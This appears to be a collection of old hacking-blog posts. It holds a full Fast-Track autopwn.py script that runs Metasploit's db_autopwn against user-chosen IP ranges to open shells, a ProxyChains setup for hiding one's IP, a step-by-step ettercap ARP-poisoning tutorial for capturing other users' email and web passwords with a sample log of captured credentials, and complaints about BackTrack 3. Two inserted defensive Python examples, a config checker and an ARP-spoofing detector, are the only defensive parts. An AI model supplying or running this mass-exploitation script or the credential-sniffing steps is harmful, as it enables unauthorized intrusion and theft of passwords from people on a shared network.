Seems like there've been some minor changes in the Metasploit Framework 3. One effect is that the Autopwn automation in Fast-Track no longer works. Running the script gives the following error:

.
.
msf > load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /opt/metasploit3/msf3/plugins/db_sqlite3: Deprecated plugin
msf > db_driver sqlite3
[*] Using database driver sqlite3

One solution is to open up msfconsole and type the commands manually, but that rather defeats the purpose of having Fast-Track installed (in a limited way of course :p). Fortunately, the fix is very easy. All you need to do is modify the autopwn file in the /pentest/exploits/fasttrack/bin/ftsrc directory. First open the file in any text editor of your choice and look for these lines (the one to change is the load db_sqlite3 line):

try:
    child1 = pexpect.spawn('%smsfconsole' % (metapath))
    # load sqlite3
    child1.sendline('load db_sqlite3')
    # Destroy database
    child1.sendline('db_destroy pentest')
    # Create database
    child1.sendline('db_create pentest')

Now replace load db_sqlite3 with db_driver sqlite3, so the line reads child1.sendline('db_driver sqlite3'), and save the file.
Everything will work fine.

Alternatively you can copy-paste the following text into a text editor and save the file as "autopwn.py" (minus quotes) in the directory /pentest/exploits/fasttrack/bin/ftsrc. You'll need root access to replace the existing file.

#!/usr/bin/env python
# Fast-Track autopwn.py with the deprecated "load db_sqlite3" replaced by
# "db_driver sqlite3" (sqlite3 is now built into Metasploit 3 as the default driver).
import pexpect, sys, os, time, glob
try:
    import psyco
    psyco.full()
except ImportError:
    pass
definepath = os.getcwd()
try:
    ipaddr = sys.argv[3]
except IndexError:
    ipaddr = raw_input("""
Metasploit Autopwn Automation

http://www.metasploit.com

This tool specifically piggy backs some commands from the Metasploit Framework and does
not modify the Metasploit Framework in anyway. This is simply to automate some tasks
from the autopwn feature already developed by the Metasploit crew.

Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254 or 192.168.1.1/24
or whatever you want and it'll run against those hosts. Additionally you can place NMAP
commands within the autopwn ip ranges bar, for example, if you want to scan even if a
host "appears down" just do -PN 192.168.1.1-254 or whatever...you can use all NMap
syntaxes in the Autopwn IP Ranges portion.

When it has completed exploiting simply type this:

sessions -l (lists the shells spawned)
sessions -i (jumps you into the sessions)

Example 1: -PN 192.168.1.1
Example 2: 192.168.1.1-254
Example 3: -P0 -v -A 192.168.1.1
Example 4: 192.168.1.1/24

Enter the ip ranges to autopwn: """)
if ipaddr == 'quit' or ipaddr == 'q':
    print "\n\nExiting Fast-Track autopwn...\n\n"
    sys.exit()
# Ask for the payload direction (bind or reverse)
try:
    option1 = sys.argv[4]
except IndexError:
    option1 = raw_input("""
Do you want to do a bind or reverse payload?

Bind = direct connection to the server
Reverse = connection originates from server

1. Bind
2. Reverse

Enter number: """)
if option1 == 'quit' or option1 == 'q':
    print "\n\nExiting Fast-Track autopwn...\n\n"
    sys.exit()
if option1 == '1': option1 = '-b'
if option1 == '2': option1 = '-r'
print "Launching MSFConsole and prepping autopwn..."
# Locate the Metasploit install: Fast-Track's config file first, then known default paths
try:
    counter = 0
    for line in open("%s/bin/setup/metasploitconfig.file" % (definepath)).readlines():
        metapath = line.rstrip()
except IOError:
    print "Configuration file not detected, running default path."
    print "Recommend running setup.py install to configure Fast-Track."
    print "Setting default directory..."
    counter = 0
    # BT3
    if os.path.isfile("/pentest/exploits/framework3/msfconsole"):
        metapath = "/pentest/exploits/framework3/"
        counter = 1
    # NUbuntu (the framework directory carries a version suffix, so glob for it)
    for candidate in glob.glob("/tools/exploits/framework*/msfconsole"):
        metapath = os.path.dirname(candidate) + "/"
        counter = 1
    if counter == 0:
        print "Metasploit not detected..Exiting.."
        sys.exit()

# Spawn msfconsole and feed it the autopwn command sequence
try:
    child1 = pexpect.spawn('%smsfconsole' % (metapath))
    # select the sqlite3 database driver (replaces the deprecated "load db_sqlite3")
    child1.sendline('db_driver sqlite3')
    # Destroy database
    child1.sendline('db_destroy pentest')
    # Create database
    child1.sendline('db_create pentest')
    # run actual port scans
    child1.sendline('''db_nmap %s ''' % (ipaddr))
    # run actual exploitation
    child1.sendline('db_autopwn -p -t -e %s' % (option1))
    child1.sendline('sleep 5')
    child1.sendline('jobs -K')
    child1.sendline('\n\n\n')
    child1.sendline('sessions -l')
    child1.sendline('echo "If it states No sessions, then you were unsuccessful. Simply type sessions -i to jump into a shell"')
    # hand the console over to the user
    child1.interact()
except Exception:
    print "\nExiting Fast-Track...\n"

There are probably dozens of programs on any OS that don't have any option for using proxies. Many common command line tools like ping and traceroute don't work if the network you are on forces you to use a proxy. I finally found a way to specify a proxy for these programs. ProxyChains is a very good tool that lets you push a program through a proxy, not only to reach outside networks but also through anonymous proxies for your privacy.

It's quite simple to install and use. First download and install the script.

Then navigate to the /etc folder and open the proxychains.conf file in any text editor of your choice. It should look like this.

# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests - no leak for DNS data
proxy_dns

# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
# type host port [user pass]
# (values separated by 'tab' or 'blank')
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
http 10.123.137.1 8080
socks4 111.44.45.31 80

Now, depending on your network configuration, you'll need to add proxies to this file. If you're on a network that routes all data through a proxy server, replace the first entry under [ProxyList] (http 10.123.137.1 8080 in the sample above) with the type of your proxy (http, socks4 or socks5), its IP address and its port number, separating each field with a TAB. That's enough to force your programs to use your network's proxy.

But if you want to use another proxy for any purpose, including hiding your IP, you can add further proxies with their type and port number in the same way (the second entry, socks4 111.44.45.31 80, in the sample). Additionally you may have to add a username and password if the proxy server requires them.

Notice the options #dynamic_chain, #strict_chain and #random_chain.
Removing the # sign from exactly one of these three selects the order in which the proxies are used. In this example I'm using the strict_chain option, though dynamic_chain will also work.

Save the file and exit the text editor. Now it's time to see it in action. Open your command line and put proxychains before the program name to force it to use your proxy list.

user~# proxychains program

As simple as that :)
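As an added example (not part of ProxyChains or of this post), here is a small Python checker for the configuration described above: it reads a proxychains.conf body, reports which chain mode is active and which ProxyList entries parse, and flags the mistakes the file's own comments warn about (two modes uncommented, chain_len without random_chain, proxy_dns missing, malformed entries). SAMPLE_CONF is constructed from the uncommented lines of the sample above plus one authenticated socks5 entry copied from the file's examples.

```python
CHAIN_MODES = ("dynamic_chain", "strict_chain", "random_chain")
PROXY_TYPES = ("http", "socks4", "socks5")

# Constructed sample: the live lines of the config above plus one authenticated entry.
SAMPLE_CONF = """\
#dynamic_chain
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
http 10.123.137.1 8080
socks4 111.44.45.31 80
socks5 192.168.67.78 1080 lamer secret
"""

def parse_proxychains(text):
    """Return (active chain mode or None, global options, proxies, warnings)."""
    chain_modes, options, proxies, warnings = [], {}, [], []
    in_list = False
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()          # '#' starts a comment
        if not line:
            continue
        if line == "[ProxyList]":
            in_list = True
            continue
        if not in_list:                              # global option: key [= value]
            key, _, value = line.replace("=", " ").partition(" ")
            if key in CHAIN_MODES:
                chain_modes.append(key)
            else:
                options[key] = value.strip()
            continue
        f = line.split()                             # type host port [user pass]
        if f[0] not in PROXY_TYPES or len(f) not in (3, 5) or not f[2].isdigit():
            warnings.append("line %d: malformed ProxyList entry %r" % (n, raw))
            continue
        proxies.append({"type": f[0], "host": f[1], "port": int(f[2]),
                        "user": f[3] if len(f) == 5 else None})
    if len(chain_modes) > 1:   # the file says the last uncommented mode wins
        warnings.append("several chain modes uncommented %s; last one wins" % chain_modes)
    if "proxy_dns" not in options:
        warnings.append("proxy_dns not set: DNS lookups bypass the proxies (leak)")
    if "chain_len" in options and chain_modes[-1:] != ["random_chain"]:
        warnings.append("chain_len only applies to random_chain")
    if any(p["user"] for p in proxies):
        warnings.append("plaintext proxy credentials in file; restrict its permissions")
    return (chain_modes[-1] if chain_modes else None), options, proxies, warnings
```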

This is probably the easiest way to "hack" various passwords, including email. All you need is ettercap.
It's an easy-to-use GUI-based sniffer (good news for people scared of the command line).
Download and install the software on your PC from this link. Only source packages are available. Instructions for running on a Windows platform are here. I've not tried that yet.
For this hack to work, your PC needs to be on the network. You can't do it from outside.

First click on Sniff –> Unified Sniffing

Then click on Hosts and input the list of hosts you want to snoop on. You can either feed a list of IPs or let ettercap select the online hosts in your subnet. I tried sniffing hosts outside my subnet (there is a reason why I had this idea of sniffing), but that hasn't worked well yet.

Click on Mitm (for newbies, MITM stands for Man In The Middle) and then on ARP poisoning. In the next box, select Sniff remote connections.

Click on Start –> Start Sniffing.

Now keep an eye on the output screen as the users login to websites. Their login details are displayed in plain text. :D

In case you don't see anything, you may need to do a bit of work. Find the file ettercap.conf and remove the # sign from the last two lines below.

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport $
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport$

The ettercap.conf file lives in /usr/local/etc.

Here is a sample of what I captured on one of my networks. Details have been changed to protect the innocents. :P

Listening on eth0… (Ethernet)

eth0 -> 00:A2:81:99:BA:01 10.17.167.60 255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
26 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…

HTTP : 10.17.167.24:8080 -> USER: a23bb2-dc2d-4435-be54-cbf8a64431cb PASS: HTRnheQp INFO: http://online.speedbit.com/online/update.aspx?CV=1.1.0.6&
DHCP: [00:0D:60:9F:10:0E] REQUEST 10.17.167.188
DHCP: [10.17.167.1] ACK : 10.17.167.188 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.2 “smtup.com”
POP : 10.17.166.21:110 -> USER: user.one PASS: mypass1234
HTTP : 116.143.123.122:80 -> USER: 4f3ab8b2-dc2d-c245-a654-0ca8a64431cb PASS: nRHh6Pq INFO: online.speedbit.com/
DHCP: [10.17.167.1] ACK : 10.17.167.169 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.2 “mydomain.com”
HTTP : 202.137.234.20:80 -> USER: mantris PASS: yourpass INFO: http://www.rediff.com
DHCP: [00:23:E6:1B:FD:7F] REQUEST 10.17.16.69
DHCP: [10.17.16.1] ACK : 10.17.167.69 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.3 “mydomain.com”
HTTP : 10.17.16.24:8080 -> USER: kaykay PASS: batman INFO: http://www.rediff.com/index.html

Do not misuse this information. I use this tool only to monitor traffic for illegal activities on my network.

Greets: remote-exploit.org
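The ARP poisoning step above is also what a network monitor sees from the other side: the gateway's IP suddenly answering from a new MAC, and one MAC claiming several hosts. The following detector is an added example, not part of ettercap or of this post; the ARP replies in SAMPLE_ARP are constructed (addresses from the 10.17.167.0/24 subnet seen in the capture, MACs made up), where a real sensor would feed records parsed from tcpdump or similar.

```python
from collections import defaultdict

# Constructed ARP replies as (time, sender_ip, sender_mac). IPs follow the subnet
# in the capture above; the MACs are made up (locally administered 02:... range).
GW, VICTIM_A, VICTIM_B, ATTACKER = ("02:00:00:00:00:01", "02:00:00:00:00:02",
                                    "02:00:00:00:00:03", "02:00:00:00:00:99")
SAMPLE_ARP = [
    (1, "10.17.167.1",  GW),        # gateway announces itself
    (2, "10.17.167.60", VICTIM_A),
    (3, "10.17.167.24", VICTIM_B),
    (9, "10.17.167.1",  ATTACKER),  # poisoning: gateway IP now maps to another MAC
    (9, "10.17.167.60", ATTACKER),  # the same MAC also claims both victims
    (9, "10.17.167.24", ATTACKER),  # ("sniff remote connections" poisons both sides)
]

def detect_arp_poisoning(records, max_ips_per_mac=2, known_multi_ip=()):
    """Return alert tuples from a stream of (time, ip, mac) ARP replies.

    ("ip_changed", ip, old_mac, new_mac): an IP that used to resolve to one MAC
        now resolves to another, the classic poisoning symptom.
    ("mac_claims_many", mac, count): one MAC answering for more than
        max_ips_per_mac addresses; fires once, when the threshold is crossed.
    Routers or hosts with IP aliases legitimately answer for several addresses,
    so list their MACs in known_multi_ip to suppress that second alert.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for _ts, ip, mac in records:
        mac = mac.lower()
        old = ip_to_mac.get(ip)
        if old is not None and old != mac:
            alerts.append(("ip_changed", ip, old, mac))
        ip_to_mac[ip] = mac                      # keep tracking the current claim
        mac_to_ips[mac].add(ip)
        if mac not in known_multi_ip and len(mac_to_ips[mac]) == max_ips_per_mac + 1:
            alerts.append(("mac_claims_many", mac, len(mac_to_ips[mac])))
    return alerts
```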

I installed BackTrack 3 on my PC at work. Installing it in a dual boot configuration along with XP proved to be a nightmare. Messed up my XP partition once and was unable to get dual boot working properly. It'd work fine for 2-3 days and then mess up. At first it was LILO giving crazy errors and garbled text, so I followed instructions posted by GoodGirl in the Remote Exploit forums and installed GRUB. I don't know if it really worked for the people who posted there thanking her, but that tutorial has many errors.
Using BackTrack 3 hasn't proved to be a good experience either. It has quite a few bugs, or maybe it's just the underpowered PC I have here (256MB RAM only). My list of annoyances:
1) Linux is fast. Much faster than Windows, with little lag and programs almost never hanging up. But BT 3 is an exception. It's very slow; running 2-3 programs simultaneously is a sure way to slow down or crash everything. I've installed this OS 2 times with different images (the USB one).
2) We have a proxy here. I tried my best but was unable to get any program except browsers and chat clients to use the proxy for accessing external networks. Updating doesn't work either. I'm unable to find a proxy setting for the system like there is for Windows services. Wise guys at the RE forums had their own ethically White Hat views on this.
3) Compiz Fusion is a complete dud. Themes don't work properly. Not to mention you can't download new themes due to the proxy restriction. Maybe it's due to low RAM.
4) The mouse has gone crazy. It cannot differentiate between single and double clicks. I tried almost everything in Mouse settings: increasing/decreasing sensitivity, lag time, changing themes. But it's stuck. Sometimes my clicks get recognised as single, at other times as double. You can guess the results. The same mouse works fine in XP.
5) GUI installation has been removed. Now it's back to command line installation. You can copy the installation script, the bt3.kmdr file, from older distros for a graphical install though. Here is the file. Some senior members say that they prefer people to use thumbdrives for running BT 3. Why'd anybody use thumbdrives if they can install on the HDD, except in rare cases?
BT 3 Beta and even XP are a lot better than this (except for the proxy). I'm still using BT 3 Beta on my home PC. No use taking chances with all that data there.

Using Linux (BackTrack) is proving to be a real learning experience. I always wanted to use Linux instead of Windows as my primary OS. I tried shifting to Linux many times in the past, trying Xandros, Ubuntu, Red Hat and some more flavours, but couldn't get anything done with them. Not that they were particularly bad. The main reason was the lack of a reliable internet connection.
Nowadays, with a good net connection, any time I'm stuck with something I just search for it on a search engine (Google mostly) and more often than not I have the solution within minutes.
I was unable to do so earlier without internet.
Nowadays almost every Linux distro on any platform supports almost every piece of hardware straight out of the box, but still many times you need to download some file to make something work.
In my case, I haven't been able to get my RTL8139 chipset NIC to work :-|
Not that I particularly need it. The onboard card works without a hitch, but still I'd like it to work, just for the sake of the challenge.

:D

I've downloaded and successfully installed a lot of good software,
the list includes
VMware (server and player, both free)
Opera Browser
Some misc system software including Wine, sqlite3, postgres and many more.
Currently downloading OpenOffice. I hope it'll install fine without giving much trouble now.
Finally learnt to use the multiple desktop option.
Still, some stuff proves to be quite difficult.

Games for one. No Windows game will work here.
Sometimes some games seem to work with Wine, but they crash soon. Updating the software to a newer version was of no help.

Then I tried installing Cedega, but was put off by their ridiculous 5 Euro per month subscription fee. That's too much to pay in any case.
Then I tried installing the free version, Cedega CVS. After going through numerous guides and installing dozens of packages I'm still unable to run any game.

To top that, BackTrack lacks support for multi-channel sound.

Enquiring about these issues in the BT forum gets the response, "This is a pen-testing distro. Not meant for games, music etc" :|
Well, I can understand that, but even with a pen test distro, a person sometimes will really like to use it as his/her primary OS. This point apparently escaped the notice of the BT people.
Not much use complaining. They've made and released this excellent OS for free after all.

My Windows installation still stays...for games only.